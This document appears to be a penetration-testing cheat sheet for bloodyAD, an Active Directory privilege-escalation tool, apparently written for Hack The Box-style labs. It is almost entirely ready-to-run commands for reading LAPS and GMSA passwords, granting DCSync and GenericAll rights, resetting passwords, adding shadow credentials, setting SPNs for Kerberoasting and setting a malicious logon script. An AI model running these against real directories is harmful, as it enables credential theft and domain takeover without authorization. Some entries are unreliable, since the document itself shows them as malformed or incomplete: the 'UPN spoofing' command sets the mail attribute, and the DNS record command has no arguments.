# BloodyAD ## Introduction This tool can perform specific LDAP calls to a domain controller for Active Directory privilege escalation. On **Kali Linux**, the tool can be installed simply through the following command: ```bash sudo apt install bloodyad -y ``` ### GitHub Repository **GitHub Repository:** [CravateRouge/bloodyAD - BloodyAD is an Active Directory Privilege Escalation Framework](https://github.com/CravateRouge/bloodyAD) ## Attacking AD using bloodyAD ### Read LAPS Password ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime ``` ### Read GMSA Password ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get object 'TARGET' --attr msDS-ManagedPassword ``` ### Enable DONT\_REQ\_PREAUTH for ASREPRoast ***Requires GenericAll/GenericWrite permissions*** ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH ``` ### Disable ACCOUNTDISABLE to Enable a Disabled User ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove uac 'TARGET' -f ACCOUNTDISABLE ``` ### Add User to a Group ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add groupMember 'GROUP_TARGET' 'USER_TARGET' ``` ### Shadow Credentials Attack ***Followed by Pass-the-Hash*** ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add shadowCredentials 'target' ``` ### Assign servicePrincipalName (SPN) to User for Kerberoasting Attack ***Requires GenericAll/GenericWrite permissions over the target user*** ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo' ``` ### Make User Owner of an Object ***Requires WriteOwner permissions*** ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET' ``` ### Assign GenericAll Permissions Over a User to an Object for Full Control ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET' ``` ### Change User Password ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!' ``` ### Add DCSync Permissions Over an Object ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET' ``` ### Assign Malicious Script to User (Executes on Login) ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\\malicious.bat' ``` ### Create New DNS Record for DNS Spoofing Attacks ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add dnsRecord ``` ### Assign Different UPN (userPrincipalName) for UPN Spoofing Attacks ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'user_target' mail -v 'impersonateUser@domain.htb' ``` ### Assign Value to altSecurityIdentities Attribute for X.509/ESC14 Attacks ```bash bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'user_target' altSecurityIdentities -v 'X509:<.........>' ``` ## Notes * Replace `10.10.10.10` with the target domain controller IP address * Replace `domain.htb` with the target domain name * Replace `'user'` and `'password'` with valid credentials * Replace target placeholders (`TARGET`, `USER_TARGET`, `OBJECT_TARGET`, etc.) with actual target names * Some commands require specific permissions as noted in their descriptions